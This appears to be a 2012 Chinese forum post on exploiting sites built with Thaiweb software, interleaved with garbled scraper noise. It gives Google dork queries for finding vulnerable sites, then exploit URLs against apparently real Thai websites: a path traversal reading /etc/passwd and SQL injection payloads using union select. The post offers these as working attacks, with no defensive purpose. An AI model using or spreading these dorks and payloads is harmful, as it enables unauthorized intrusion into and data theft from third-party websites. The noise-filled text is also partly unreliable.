Google之:
* P& [' [. T- D( R
4 p* F/ Z6 {/ E C4 u/ u Z4 _intext:powered by Thaiweb4 `8 F: ^$ }3 A) e
) g) t3 b; \/ y: A# W2 cinurl:index.php?page=board.php
' ?7 v3 m! R; W+ p) v2 }. @- a' f1 M; M5 t; j& o0 S. m6 x
9 r) Y0 H; i2 J2 D% `( [) p: K) [% U$ Q( ^/ s O9 \9 v8 r
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
0 ]+ z! D0 K5 x' Z' O8 @
/ h3 O( ?9 c3 P " F9 ]& A a( b( }7 t
`: D* n0 }& E& P( F% P5 o( n利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
* L+ o4 c& e4 j, H7 x$ f$ H" O
( m I& x- C2 F- E3 _
& ^/ m; _- w" t& n- r; a) J8 a4 N% ]1 j8 S& h9 y: `6 R$ T; ^3 Y
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
. F5 S5 i% W w/ L8 o- t3 C' k. Y4 i; W f. g
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--+ J( E7 Z9 Y) r4 `0 j, [
- V7 J; @4 G0 l m2 j( ohttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
: q& \( f3 L9 M% e# S S |
发表于 2012-12-27 08:38:39
收藏
支持
反对